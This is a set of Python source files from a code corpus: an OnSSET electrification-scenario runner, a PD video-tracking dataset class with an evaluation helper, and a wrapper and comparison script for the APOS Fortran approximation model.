# onsseter.run_elec(grid_calc, max_grid_extension_dist, year, start_year, end_year, time_step, grid_cap_gen_limit)
#
# onsseter.results_columns(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc,
# grid_calc, year)
#
# onsseter.calculate_investments(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
# sa_diesel_calc, grid_calc, year, end_year, time_step)
#
# onsseter.apply_limitations(eleclimit, year, time_step)
#
# onsseter.final_decision(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc,
# grid_calc, year, end_year, time_step)
#
# onsseter.delete_redundant_columns(year)
#
# ### END OF FIRST RUN
# yearsofanalysis = list(range((start_year + time_step), end_year + 1, time_step))
yearsofanalysis = [2030]
eleclimits = {2030: 1}
time_steps = {2030: 15}
# This is used in the calculation of summaries at the end
elements = ["1.Population", "2.New_Connections", "3.Capacity", "4.Investment"]
techs = ["Grid", "SA_Diesel", "SA_PV", "MG_Diesel", "MG_PV", "MG_Wind", "MG_Hydro"]
sumtechs = []
for element in elements:
for tech in techs:
sumtechs.append(element + "_" + tech)
total_rows = len(sumtechs)
df_summary = pd.DataFrame(columns=yearsofanalysis)
for row in range(0, total_rows):
df_summary.loc[sumtechs[row]] = "Nan"
## If one wants time steps please un-comment below section within triple dashes
###
# The runner beggins here..
for year in yearsofanalysis:
#eleclimit = float(input('Provide the targeted electrification rate in {}:'.format(year)))
eleclimit = eleclimits[year]
time_step = time_steps[year]
#investlimit = int(input('Provide the targeted investment limit (in USD) for the year {}:'.format(year)))
onsseter.set_scenario_variables(year, num_people_per_hh_rural, num_people_per_hh_urban, time_step,
start_year, urban_elec_ratio, rural_elec_ratio)
onsseter.calculate_off_grid_lcoes(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc, year, start_year, end_year, time_step)
onsseter.pre_electrification(grid_calc, grid_price, year, time_step, start_year)
onsseter.run_elec(grid_calc, max_grid_extension_dist, year, start_year, end_year, time_step, grid_cap_gen_limit)
# if year == end_year:
# onsseter.calculategridyears(start_year, year, gridspeed=10)
# else:
# pass
onsseter.results_columns(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc, grid_calc, year)
onsseter.calculate_investments(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
sa_diesel_calc, grid_calc, year, end_year, time_step)
onsseter.apply_limitations(eleclimit, year, time_step)
onsseter.final_decision(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc, grid_calc, year, end_year, time_step)
onsseter.calc_summaries(df_summary, sumtechs, year)
### Time step ends here
df_summary.to_csv(summary_csv, index=sumtechs)
onsseter.df.to_csv(settlements_out_csv, index=False)
# if do_combine:
# print('\n --- Combining --- \n')
# df_base = pd.DataFrame()
# summaries = pd.DataFrame(columns=countries)
#
# for country in countries:
# print(country)
# df_add = pd.read_csv(os.path.join(output_dir, '{}_{}_{}.csv'.format(country, wb_tier_urban, diesel_tag)))
# df_base = df_base.append(df_add, ignore_index=True)
#
# summaries[country] = pd.read_csv(os.path.join(output_dir, '{}_{}_{}_summary.csv'.format(country,
# wb_tier_urban,
# diesel_tag)),
# squeeze=True, index_col=0)
#
# print('saving csv')
# df_base.to_csv(os.path.join(output_dir, '{}_{}.csv'.format(wb_tier_urban, diesel_tag)), index=False)
# summaries.to_csv(os.path.join(output_dir, '{}_{}_summary.csv'.format(wb_tier_urban, diesel_tag)))
|
StarcoderdataPython
|
3248148
|
<reponame>derekray311511/permatrack
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pycocotools.coco as coco
import numpy as np
import torch
import json
import cv2
import os
import math
from ..video_dataset import VideoDataset
class PDTracking(VideoDataset):
num_categories = 5
dataset_folder = 'pd'
default_resolution = [384, 960]
class_name = ['Pedestrian', 'Car', 'Cyclist', 'Caravan/RV', 'Truck']
# negative id is for "not as negative sample for abs(id)".
# 0 for ignore losses for all categories in the bounding box region
# ['Pedestrian', 'Car', 'Bicyclist', 'Bus', 'Caravan/RV', 'OtherMovable',
# 'Motorcycle', 'Motorcyclist', 'OtherRider', 'Train', 'Truck', 'Dontcare']
cat_ids = {1:1, 2:2, 3:3, 4:-9999, 5:4, 6:-2, 7:-9999, 8:-1, 9:-1, 10:-9999, 11:5}
max_objs = 500
def __init__(self, opt, split, rank=None):
data_dir = os.path.join(opt.data_dir, self.dataset_folder)
split_ = 'train' if opt.dataset_version != 'test' else 'test' #'test'
img_dir = data_dir
if split == 'train':
ann_file_ = "train"
else:
ann_file_ = 'val'
ann_path = os.path.join(
data_dir, 'annotations', 'tracking_{}.json'.format(
ann_file_))
self.images = None
super(PDTracking, self).__init__(opt, split, ann_path, img_dir)
self.box_size_thresh = [300, 500, 300, 500, 500]
if opt.only_ped:
self.num_categories = 1
self.class_name = ['person']
self.cat_ids = {1:1, 2:-9999, 3:-1, 4:-9999, 5:-9999, 6:-9999, 7:-9999, 8:-1, 9:-1, 10:-9999, 11:-9999}
self.box_size_thresh = [300]
if opt.nu:
self.num_categories = 8
self.class_name = ['Car', 'Truck', 'Bus', 'Trailer', 'construction_vehicle', 'Pedestrian', 'Motorcycle', 'Bicycle']
self.cat_ids = {1:6, 2:1, 3:0, 4:3, 5:1, 6:-1, 7:-7, 8:0, 9:0, 10:-9999, 11:2, 12:5, 13:-8}
self.box_size_thresh = [500, 500, 500, 500, 500, 300, 500, 500]
self.alpha_in_degree = False
self.depth_scale = 1
self.dep_mask = 0
self.dim_mask = 1
self.rot_mask = 0
self.amodel_offset_mask = 0
self.ignore_amodal = True
self.num_samples = len(self.images)
self.exp_id = opt.exp_id
if opt.const_v_over_occl:
self.const_v_over_occl = True
print('Loaded {} {} samples'.format(split, self.num_samples))
def save_results_ioueval(self, results, save_dir):
formattted_results = []
if not os.path.exists(save_dir):
os.mkdir(save_dir)
for video in self.coco.dataset['videos']:
video_id = video['id']
images = self.video_to_images[video_id]
for image_info in images:
img_id = image_info['id']
if not (img_id in results):
continue
frame_id = image_info['frame_id']
for i in range(len(results[img_id])):
item = results[img_id][i]
if item['age'] != 1:
continue
if 'visibility' in item and not item['visibility']:
continue
category_id = item['class']
track_id = item['tracking_id'] if 'tracking_id' in item else -1
bbox = [item['bbox'][0].item(), item['bbox'][1].item(), item['bbox'][2].item() - item['bbox'][0].item(), item['bbox'][3].item() - item['bbox'][1].item()]
entry = {'video_id': video_id, 'image_id': img_id, 'category_id': category_id, 'track_id': track_id, 'bbox': bbox, 'score': item['score'].item()}
formattted_results.append(entry)
print(save_dir + '/iou_eval.json')
json.dump(formattted_results, open(save_dir + '/iou_eval.json', 'w'))
def run_eval(self, results, save_dir, write_to_file=False, dataset_version="val"):
self.save_results_ioueval(results, save_dir)
os.chdir("../tao")
command = 'python scripts/evaluation/evaluate.py ' + \
'../data/%s/annotations/tracking_%s_tao.json ' % (self.dataset_folder, dataset_version) + \
'{}/iou_eval.json'.format(save_dir) + ' --config-updates CATEGORIES 1,2'
if write_to_file:
print("Writing to file")
command += ' > ../exp/tracking/{}/eval_out.txt'.format(self.exp_id)
os.system(command)
def __len__(self):
return self.num_samples
def _to_float(self, x):
return float("{:.2f}".format(x))
|
StarcoderdataPython
|
1771344
|
<filename>tlux/approximate/apos/test/compare_versions.py
import fmodpy
import os
import numpy as np
_this_dir = os.path.dirname(os.path.abspath(__file__))
# Build a class that contains pointers to the model internals, allowing
# python attribute access to all of the different components of the models.
class AposModel:
def __init__(self, config, model):
self.config = config
self.model = model
self.a_embeddings = self.model[self.config.asev-1:self.config.aeev].reshape(self.config.ade, self.config.ane, order="F")
self.a_input_vecs = self.model[self.config.asiv-1:self.config.aeiv].reshape(self.config.adi, self.config.ads, order="F")
self.a_input_shift = self.model[self.config.asis-1:self.config.aeis].reshape(self.config.ads, order="F")
self.a_state_vecs = self.model[self.config.assv-1:self.config.aesv].reshape(self.config.ads, self.config.ads, max(0,self.config.ans-1), order="F")
self.a_state_shift = self.model[self.config.asss-1:self.config.aess].reshape(self.config.ads, max(0,self.config.ans-1), order="F")
self.a_output_vecs = self.model[self.config.asov-1:self.config.aeov].reshape(self.config.adso, self.config.ado, order="F")
self.m_embeddings = self.model[self.config.msev-1:self.config.meev].reshape(self.config.mde, self.config.mne, order="F")
self.m_input_vecs = self.model[self.config.msiv-1:self.config.meiv].reshape(self.config.mdi, self.config.mds, order="F")
self.m_input_shift = self.model[self.config.msis-1:self.config.meis].reshape(self.config.mds, order="F")
self.m_state_vecs = self.model[self.config.mssv-1:self.config.mesv].reshape(self.config.mds, self.config.mds, max(0,self.config.mns-1), order="F")
self.m_state_shift = self.model[self.config.msss-1:self.config.mess].reshape(self.config.mds, max(0,self.config.mns-1), order="F")
self.m_output_vecs = self.model[self.config.msov-1:self.config.meov].reshape(self.config.mdso, self.config.mdo, order="F")
self.ax_shift = self.model[self.config.aiss-1:self.config.aise]
self.ay_shift = self.model[self.config.aoss-1:self.config.aose]
self.x_shift = self.model[self.config.miss-1:self.config.mise]
self.y_shift = self.model[self.config.moss-1:self.config.mose]
# Allow square brackets to access attributes of this model and its configuration.
def __getitem__(self, attr):
if hasattr(self, attr):
return getattr(self, attr)
elif hasattr(self.config, attr):
return getattr(self.config, attr)
# Create a summary string for this model.
def __str__(self, vecs=False):
# A function for creating a byte-size string from an integer.
def _byte_str(byte_size):
if (byte_size < 2**10):
byte_size = f"{byte_size} bytes"
elif (byte_size < 2**20):
byte_size = f"{byte_size//2**10:.1f}KB"
elif (byte_size < 2**30):
byte_size = f"{byte_size//2**20:.1f}MB"
elif (byte_size < 2**40):
byte_size = f"{byte_size//2**30:.1f}GB"
else:
byte_size = f"{byte_size//2**40:.1f}TB"
return byte_size
# Calculate the byte size of this model (excluding python descriptors).
# TODO: Not all configs are 4 bytes, do more expensive sum over actual sizes?
byte_size = len(self.config._fields_)*4 + self.model.dtype.itemsize*self.model.size
byte_size = _byte_str(byte_size)
if (self.config.rwork_size+self.config.iwork_size > 0):
work_size = self.config.rwork_size*4 + self.config.iwork_size*4
byte_size += " + "+_byte_str(work_size)+" work space"
# Create a function that prints the actual contents of the arrays.
if vecs: to_str = lambda arr: "\n " + "\n ".join(str(arr).split("\n")) + "\n"
else: to_str = lambda arr: "\n"
# Provide details (and some values where possible).
return (
f"APOS model ({self.config.total_size} parameters) [{byte_size}]\n"+
(" apositional\n"+
f" input dimension {self.config.adn}\n"+
f" output dimension {self.config.ado}\n"+
f" state dimension {self.config.ads}\n"+
f" number of states {self.config.ans}\n"+
(f" embedding dimension {self.config.ade}\n"+
f" number of embeddings {self.config.ane}\n"
if self.config.ane > 0 else "")+
f" embeddings {self.a_embeddings.shape} "+to_str(self.a_embeddings)+
f" input vecs {self.a_input_vecs.shape} "+to_str(self.a_input_vecs)+
f" input shift {self.a_input_shift.shape} "+to_str(self.a_input_shift)+
f" state vecs {self.a_state_vecs.shape} "+to_str(self.a_state_vecs)+
f" state shift {self.a_state_shift.shape} "+to_str(self.a_state_shift)+
f" output vecs {self.a_output_vecs.shape} "+to_str(self.a_output_vecs)+
"\n" if (self.a_output_vecs.size > 0) else "") +
(" positional\n"+
f" input dimension {self.config.mdn}\n"+
f" output dimension {self.config.mdo}\n"+
f" state dimension {self.config.mds}\n"+
f" number of states {self.config.mns}\n"+
(f" embedding dimension {self.config.mde}\n"+
f" number of embeddings {self.config.mne}\n"
if self.config.mne > 0 else "")+
f" embeddings {self.m_embeddings.shape} "+to_str(self.m_embeddings)+
f" input vecs {self.m_input_vecs.shape} "+to_str(self.m_input_vecs)+
f" input shift {self.m_input_shift.shape} "+to_str(self.m_input_shift)+
f" state vecs {self.m_state_vecs.shape} "+to_str(self.m_state_vecs)+
f" state shift {self.m_state_shift.shape} "+to_str(self.m_state_shift)+
f" output vecs {self.m_output_vecs.shape} "+to_str(self.m_output_vecs)
if (self.m_output_vecs.size > 0) else "")
)
# Class for calling the underlying APOS model code.
class APOS:
# Make the string function return the unpacked model.
def __str__(self): return str(self.unpack())
# Initialize a new APOS model.
def __init__(self, source="apos.f90", name=None, **kwargs):
try:
import fmodpy
apos = fmodpy.fimport(source, name=name, blas=True,
lapack=True, omp=True, wrap=True,
verbose=False, output_dir=_this_dir,
)
# Store the Fortran module as an attribute.
self.APOS = apos.apos
except:
# TODO:
# - python fallback that supports the basic evaluation of
# a model (but no support for training new models).
raise(NotImplementedError("The Fortran source was not loaded successfully."))
# Set defaults for standard internal parameters.
self.steps = 1000
self.seed = None
self.num_threads = None
self.config = None
self.model = np.zeros(0, dtype="float32")
self.record = np.zeros(0, dtype="float32")
# Default descriptors for categorical inputs.
self.axi_map = []
self.axi_sizes = []
self.axi_starts = []
self.xi_map = []
self.xi_sizes = []
self.xi_starts = []
self.yi_map = []
self.yi_sizes = []
self.yi_starts = []
# Initialize the attributes of the model that can be initialized.
self._init_model(**kwargs)
# Initialize a model, if possible.
def _init_model(self, **kwargs):
# Apositional model parameters.
adn = kwargs.pop("adn", 0)
ado = kwargs.pop("ado", None)
ads = kwargs.pop("ads", None)
ans = kwargs.pop("ans", None)
ade = kwargs.pop("ade", None)
ane = kwargs.pop("ane", None)
# Model parameters.
mdn = kwargs.pop("mdn", None)
mdo = kwargs.pop("mdo", None)
mds = kwargs.pop("mds", None)
mns = kwargs.pop("mns", None)
mde = kwargs.pop("mde", None)
mne = kwargs.pop("mne", None)
# Number of threads.
self.num_threads = kwargs.pop("num_threads", self.num_threads)
self.seed = kwargs.pop("seed", self.seed)
self.steps = kwargs.pop("steps", self.steps)
# Initialize if enough arguments were provided.
if (None not in {adn, mdn, mdo}):
self.config = self.APOS.new_model_config(
adn=adn, ado=ado, ads=ads, ans=ans, ane=ane, ade=ade,
mdn=mdn, mdo=mdo, mds=mds, mns=mns, mne=mne, mde=mde,
num_threads=self.num_threads)
# Set any configuration keyword arguments given at initialization
# that were not passed to "new_model_config".
for n in ({n for (n,t) in self.config._fields_} & set(kwargs)):
setattr(self.config, n, kwargs[n])
# Set all internal arrays and initialize the model.
self.model = np.zeros(self.config.total_size, dtype="float32")
self.APOS.init_model(self.config, self.model, seed=self.seed)
# Generate the string containing all the configuration information for this model.
def config_str(self):
s = ""
max_n_len = max(map(len,(n for (n,t) in self.config._fields_)))
max_t_len = max(map(len,(str(t).split("'")[1].split('.')[1]
for (n,t) in self.config._fields_)))
for (n,t) in self.config._fields_:
t = str(t).split("'")[1].split('.')[1]
s += f" {str(t):{max_t_len}s} {n:{max_n_len}s} = {getattr(self.config,n)}\n"
return s
# Unpack the model (which is in one array) into it's constituent parts.
def unpack(self):
# If there is no model or configuration, return None.
if (self.config is None) or (self.model is None):
return None
return AposModel(self.config, self.model)
# Given a categorical input array, construct a dictionary for
# mapping the unique values in the columns of the array to integers.
def _i_map(self, xi):
if (len(xi.dtype) > 0):
xi_map = [np.unique(xi[n]) for n in xi.dtype.names]
else:
xi_map = [np.unique(xi[:,i]) for i in range(xi.shape[1])]
xi_sizes = [len(u) for u in xi_map]
xi_starts = (np.cumsum(xi_sizes) - xi_sizes[0] + 1).tolist()
return xi_map, xi_sizes, xi_starts
# Given a categorical input array (either 2D or struct), map this
# array to an integer encoding matrix with the same number of
# columns, but unique integers assigned to each unique value.
def _i_encode(self, xi, xi_map, xi_sizes, xi_starts):
xi_rows = xi.shape[0]
xi_cols = len(xi.dtype) or xi.shape[1]
_xi = np.zeros((xi_rows, xi_cols), dtype="int32", order="C")
for i in range(xi_cols):
start_index = xi_starts[i]
num_unique = xi_sizes[i]
unique_vals = xi_map[i]
vals = (xi[:,i:i+1] if len(xi.dtype) == 0 else xi[xi.dtype.names[i]])
eq_val = vals == unique_vals
# Add a column to the front that is the default if none match.
eq_val = np.concatenate((
np.logical_not(eq_val.max(axis=1)).reshape(xi_rows,1),
eq_val), axis=1)
val_indices = np.ones((xi_rows,num_unique+1), dtype="int32") * np.arange(num_unique+1)
val_indices[:,1:] += start_index-1
_xi[:,i] = val_indices[eq_val]
return _xi
# Convert all inputs to the APOS model into the expected numpy format.
def _to_array(self, y, yi, x, xi, ax, axi, sizes):
# Get the number of inputs.
if (y is not None): nm = len(y)
elif (yi is not None): nm = len(yi)
elif (x is not None): nm = len(x)
elif (xi is not None): nm = len(xi)
elif (sizes is not None): nm = len(sizes)
# Make sure that all inputs are numpy arrays.
if (y is not None): y = np.asarray(y, dtype="float32", order="C")
else: y = np.zeros((nm,0), dtype="float32", order="C")
if (yi is not None): yi = np.asarray(yi)
else: yi = np.zeros((nm,0), dtype="int32", order="C")
if (x is not None): x = np.asarray(x, dtype="float32", order="C")
else: x = np.zeros((nm,0), dtype="float32", order="C")
if (xi is not None): xi = np.asarray(xi)
else: xi = np.zeros((nm,0), dtype="int32", order="C")
if (sizes is not None): sizes = np.asarray(sizes, dtype="int32")
else: sizes = np.zeros(0, dtype="int32")
na = sizes.sum()
if (ax is not None): ax = np.asarray(ax, dtype="float32", order="C")
else: ax = np.zeros((na,0), dtype="float32", order="C")
if (axi is not None): axi = np.asarray(axi)
else: axi = np.zeros((na,0), dtype="int32", order="C")
# Make sure that all inputs have the expected shape.
assert (len(y.shape) in {1,2}), f"Bad y shape {y.shape}, should be 1D or 2D matrix."
assert (len(yi.shape) in {1,2}), f"Bad yi shape {yi.shape}, should be 1D or 2D matrix."
assert (len(x.shape) in {1,2}), f"Bad x shape {x.shape}, should be 1D or 2D matrix."
assert (len(xi.shape) in {1,2}), f"Bad xi shape {xi.shape}, should be 1D or 2D matrix."
assert (len(ax.shape) in {1,2}), f"Bad ax shape {ax.shape}, should be 1D or 2D matrix."
assert (len(axi.shape) in {1,2}), f"Bad axi shape {axi.shape}, should be 1D or 2D matrix."
assert (len(sizes.shape) == 1), f"Bad sizes shape {sizes.shape}, should be 1D int vectora."
# Reshape inputs to all be two dimensional (except sizes).
if (len(y.shape) == 1): y = y.reshape((-1,1))
if (len(yi.shape) == 1) and (len(yi.dtype) == 0): yi = yi.reshape((-1,1))
if (len(x.shape) == 1): x = x.reshape((-1,1))
if (len(xi.shape) == 1) and (len(xi.dtype) == 0): xi = xi.reshape((-1,1))
if (len(ax.shape) == 1): ax = ax.reshape((-1,1))
if ((len(axi.shape) == 1) and (len(axi.dtype) == 0)): axi = axi.reshape((-1,1))
mdo = y.shape[1]
mdn = x.shape[1]
adn = ax.shape[1]
# Handle mapping "xi" into integer encodings.
xi_cols = len(xi.dtype) or xi.shape[1]
if (xi_cols > 0):
if (len(self.xi_map) == 0):
self.xi_map, self.xi_sizes, self.xi_starts = self._i_map(xi)
else:
assert (xi_cols == len(self.xi_map)), f"Bad number of columns in 'xi', {xi_cols}, expected {len(self.xi_map)} columns."
xi = self._i_encode(xi, self.xi_map, self.xi_sizes, self.xi_starts)
mne = sum(self.xi_sizes)
else: mne = 0
# Handle mapping "axi" into integer encodings.
axi_cols = len(axi.dtype) or axi.shape[1]
if (axi_cols > 0):
if (len(self.axi_map) == 0):
self.axi_map, self.axi_sizes, self.axi_starts = self._i_map(axi)
else:
assert (axi_cols == len(self.axi_map)), f"Bad number of columns in 'axi', {axi_cols}, expected {len(self.axi_map)} columns."
axi = self._i_encode(axi, self.axi_map, self.axi_sizes, self.axi_starts)
ane = sum(self.axi_sizes)
else: ane = 0
# Handle mapping "yi" into integer encodings.
yi_cols = len(yi.dtype) or yi.shape[1]
if (yi_cols > 0):
if (len(self.yi_map) == 0):
self.yi_map, self.yi_sizes, self.yi_starts = self._i_map(yi)
else:
assert (yi_cols == len(self.yi_map)), f"Bad number of columns in 'yi', {yi_cols}, expected {len(self.yi_map)} columns."
yi = self._i_encode(yi, self.yi_map, self.yi_sizes, self.yi_starts)
yne = sum(self.yi_sizes)
else: yne = 0
# Handle mapping integer encoded "yi" into a single real valued y.
if (yne > 0):
embedded = np.concatenate((
np.zeros((1,yne), dtype="float32"),
np.identity(yne, dtype="float32")), axis=0)
_y = np.zeros((nm, mdo+yne), dtype="float32")
_y[:,:mdo] = y[:,:]
for i in range(yi.shape[1]):
_y[:,mdo:] += embedded[yi[:,i]]
y = _y
mdo += yne
# Return all the shapes and numpy formatted inputs.
return nm, na, mdn, mne, mdo, adn, ane, yne, y, x, xi, ax, axi, sizes
# Fit this model.
def fit(self, x=None, y=None, yi=None, xi=None, ax=None, axi=None,
sizes=None, new_model=False, **kwargs):
# Ensure that 'y' values were provided.
assert ((y is not None) or (yi is not None)), "APOS.fit requires 'y' or 'yi' values, but neitherwere provided (use keyword argument 'y=<values>' or 'yi=<values>')."
# Make sure that 'sizes' were provided for apositional (aggregate) inputs.
if ((ax is not None) or (axi is not None)):
assert (sizes is not None), "APOS.fit requires 'sizes' to be provided for apositional input sets (ax and axi)."
# Get all inputs as arrays.
nm, na, mdn, mne, mdo, adn, ane, yne, y, x, xi, ax, axi, sizes = (
self._to_array(y, yi, x, xi, ax, axi, sizes)
)
# Configure this model if requested (or not already done).
if (new_model or (self.config is None)):
# Ensure that the config is compatible with the data.
kwargs.update({
"adn":adn,
"ane":max(ane, kwargs.get("ane",0)),
"mdn":mdn,
"mne":max(mne, kwargs.get("mne",0)),
"mdo":mdo,
})
if (max(kwargs["mdn"], kwargs["mne"]) == 0):
kwargs["ado"] = kwargs["mdo"]
kwargs["mdo"] = 0
kwargs["mns"] = 0
self._init_model(**kwargs)
# If there are integer embeddings, expand "x" and "ax" to have space to hold those embeddings.
if (self.config.ade > 0):
_ax = np.zeros((ax.shape[0],ax.shape[1]+self.config.ade), dtype="float32", order="C")
_ax[:,:ax.shape[1]] = ax
ax, _ax = _ax, ax
if (self.config.mde > 0) or (self.config.ado > 0):
_x = np.zeros((x.shape[0],self.config.mdi), dtype="float32", order="C")
_x[:,:x.shape[1]] = x
x, _x = _x, x
# ------------------------------------------------------------
# If a random seed is provided, then only 2 threads can be used
# because nondeterministic behavior comes from reordered addition.
if (self.seed is not None):
if (self.config.num_threads > 2):
import warnings
warnings.warn("Seeding an APOS model will deterministically initialize weights, but num_threads > 2 will result in a nondeterministic model fit.")
# Get the number of steps for training.
steps = kwargs.get("steps", self.steps)
# ------------------------------------------------------------
# Set up new work space for this minimization process.
self.APOS.new_fit_config(nm, na, self.config)
self.rwork = np.zeros(self.config.rwork_size, dtype="float32")
self.iwork = np.zeros(self.config.iwork_size, dtype="int32")
# Minimize the mean squared error.
self.record = np.zeros((steps,6), dtype="float32", order="C")
try:
result = self.APOS.minimize_mse(self.config, self.model, self.rwork, self.iwork,
ax.T, axi.T, sizes, x.T, xi.T, y.T,
steps=steps, record=self.record.T)
except:
yw = np.zeros((nm,0), dtype="float32", order="C")
result = self.APOS.minimize_mse(self.config, self.model, self.rwork, self.iwork,
ax.T, axi.T, sizes, x.T, xi.T, y.T, yw.T,
steps=steps, record=self.record.T)
assert (result[-1] == 0), f"APOS.minimize_mse returned nonzero exit code {result[-1]}."
# Copy the updated values back into the input arrays (for transparency).
if (self.config.mde > 0):
_x[:,:] = x[:,:_x.shape[1]]
if (self.config.ade > 0):
_ax[:,:] = ax[:,:_ax.shape[1]]
# Calling this model is an alias for 'APOS.predict'.
def __call__(self, *args, **kwargs):
return self.predict(*args, **kwargs)
# Make predictions for new data.
def predict(self, x=None, xi=None, ax=None, axi=None, sizes=None,
embedding=False, save_states=False, **kwargs):
# Evaluate the model at all data.
assert ((x is not None) or (xi is not None) or (sizes is not None)), "APOS.predict requires at least one of 'x', 'xi', or 'sizes' to not be None."
# Make sure that 'sizes' were provided for apositional (aggregate) inputs.
if ((ax is not None) or (axi is not None)):
assert (sizes is not None), "APOS.predict requires 'sizes' to be provided for apositional input sets (ax and axi)."
# Make sure that all inputs are numpy arrays.
nm, na, mdn, mne, mdo, adn, ane, yne, _, x, xi, ax, axi, sizes = (
self._to_array(None, None, x, xi, ax, axi, sizes)
)
# Embed the inputs into the purely positional form.
ade = self.config.ade
ads = self.config.ads
ado = self.config.ado
mde = self.config.mde
mds = self.config.mds
if (self.config.mdo != 0):
mdo = self.config.mdo
else:
mdo = self.config.ado
# Compute the true real-vector input dimensions given embeddings.
adn += ade
mdn += mde + ado
# ------------------------------------------------------------
# Initialize storage for all arrays needed at evaluation time.
# If there are integer embeddings, expand "ax" and "x" to have
# space to hold those embeddings.
if (self.config.ade > 0):
_ax = np.zeros((ax.shape[0],ax.shape[1]+self.config.ade), dtype="float32", order="C")
_ax[:,:ax.shape[1]] = ax
ax = _ax
ay = np.zeros((na, ado), dtype="float32", order="F")
if (self.config.mde > 0) or (self.config.ado > 0):
_x = np.zeros((x.shape[0],self.config.mdi), dtype="float32", order="C")
_x[:,:x.shape[1]] = x
x = _x
y = np.zeros((nm, mdo), dtype="float32", order="C")
if (save_states):
m_states = np.zeros((nm, mds, self.config.mns), dtype="float32", order="F")
a_states = np.zeros((na, ads, self.config.ans), dtype="float32", order="F")
else:
m_states = np.zeros((nm, mds, 2), dtype="float32", order="F")
a_states = np.zeros((na, ads, 2), dtype="float32", order="F")
# ------------------------------------------------------------
# Call the unerlying library.
info = self.APOS.check_shape(self.config, self.model, ax.T, axi.T, sizes, x.T, xi.T, y.T)
assert (info == 0), f"APOS.predict encountered nonzero exit code {info} when calling APOS.check_shape."
self.APOS.embed(self.config, self.model, axi.T, xi.T, ax.T, x.T)
result = self.APOS.evaluate(self.config, self.model, ax.T, ay, sizes,
x.T, y.T, a_states, m_states, info)
assert (result[-1] == 0), f"APOS.evaluate returned nonzero exit code {result[-1]}."
# Save the states if that's
if (save_states):
self.a_states = a_states
self.ay = ay
self.m_states = m_states
# If there are embedded y values in the output, return them to the format at training time.
if (len(self.yi_map) > 0) and (not embedding):
yne = sum(self.yi_sizes)
_y = [y[:,i] for i in range(y.shape[1]-yne)]
for i in range(len(self.yi_map)):
start = self.yi_starts[i]
size = self.yi_sizes[i]
_y.append(
self.yi_map[i][np.argmax(y[:,start:start+size], axis=1)]
)
return np.asarray(_y).T
elif (embedding and (len(self.yi_map) == 0)):
return m_states[:,:,-2]
else:
return y
# Save this model to a path.
def save(self, path):
import json
with open(path, "w") as f:
# Get the config as a Python type.
if (self.config is None): config = None
else: config = {n:getattr(self.config, n) for (n,t) in self.config._fields_}
# Write the JSON file with Python types.
f.write(json.dumps({
# Create a dictionary of the known python attributes.
"config" : config,
"model" : self.model.tolist(),
"record" : self.record.tolist(),
"xi_map" : [l.tolist() for l in self.xi_map],
"xi_sizes" : self.xi_sizes,
"xi_starts" : self.xi_starts,
"axi_map" : [l.tolist() for l in self.axi_map],
"axi_sizes" : self.axi_sizes,
"axi_starts" : self.axi_starts,
"yi_map" : [l.tolist() for l in self.yi_map],
"yi_sizes" : self.yi_sizes,
"yi_starts" : self.yi_starts,
}))
# Load this model from a path (after having been saved).
def load(self, path):
# Read the file.
import json
with open(path, "r") as f:
attrs = json.loads(f.read())
# Load the attributes of the model.
for key in attrs:
value = attrs[key]
if (key[-4:] == "_map"):
value = [np.asarray(l) for l in value]
elif (key[:2] in {"xi_","axi_","yi_"}):
pass
elif (type(value) is list):
value = np.asarray(value, dtype="float32")
setattr(self, key, value)
# Convert the the dictionary configuration into the correct type.
if (type(self.config) is dict):
self.config = self.APOS.MODEL_CONFIG(**self.config)
# Return self in case an assignment was made.
return self
import fmodpy
fmodpy.config.f_compiler_args = "-fPIC -shared -O3 -fcheck=bounds"
np.random.seed(0)
# m = 10
# kwargs = dict(
# adn = 3*m,
# ane = 8*m,
# ans = 2*m,
# ads = 2*m,
# ado = 3*m,
# mdn = 5*m,
# mne = 24*m,
# mns = 2*m,
# mds = 3*m,
# mdo = 2*m,
# seed = 0,
# num_threads = 1,
# )
# aold = APOS(source="apos_0-0-15.f90", name="apos_old", **kwargs)
# anew = APOS(source="apos_0-0-19.f90", name="apos_new", **kwargs)
# an = 200
# mn = 100
# nec = 2 # num embedding columns
# sizes = np.ones(mn, dtype=np.int32) * max(1,an // mn)
# sizes[-1] = an - sum(sizes[:-1])
# ax = np.random.random(size=(an, aold.config.adn)).astype(np.float32)
# axi = np.random.randint(1, aold.config.ane // nec, size=(an,nec))
# x = np.random.random(size=(mn, aold.config.mdn)).astype(np.float32)
# xi = np.random.randint(1, aold.config.mne // nec, size=(mn,nec))
# y = np.random.random(size=(mn, aold.config.mdo)).astype(np.float32)
aold = APOS(source="apos_0-0-15.f90", name="apos_old", seed=0, num_threads=1)
anew = APOS(source="apos_0-0-19.f90", name="apos_new", seed=0, num_threads=1)
from tlux.random import well_spaced_box
n = 100
# A function for testing approximation algorithms.
def f(x):
x = x.reshape((-1,2))
x, y = x[:,0], x[:,1]
return (3*x + np.cos(8*x)/2 + np.sin(5*y))
x = well_spaced_box(n, 2)
y = f(x)
y = np.concatenate((y, np.cos(np.linalg.norm(x,axis=1))), axis=0).reshape(-1,1)
# Create all data.
xi = np.concatenate((np.ones(len(x)),2*np.ones(len(x)))).reshape((-1,1)).astype("int32")
ax = np.concatenate((x, x), axis=0).reshape((-1,1)).copy()
axi = (np.ones(ax.shape, dtype="int32").reshape((xi.shape[0],-1)) * (np.arange(xi.shape[1])+1)).reshape(-1,1)
sizes = np.ones(xi.shape[0], dtype="int32") * 2
x = np.zeros((xi.shape[0], 0), dtype="float32", order="C")
# Initialize the models.
aold.fit(ax=ax.copy(), axi=axi, sizes=sizes, x=x.copy(), xi=xi, y=y.copy(), steps=0, num_threads=1)
anew.fit(ax=ax.copy(), axi=axi, sizes=sizes, x=x.copy(), xi=xi, y=y.copy(), steps=0, num_threads=1)
print()
print(aold)
# print(aold.unpack().__str__(vecs=True))
print()
print(anew)
# print(anew.unpack().__str__(vecs=True))
print()
nv = aold.config.num_vars
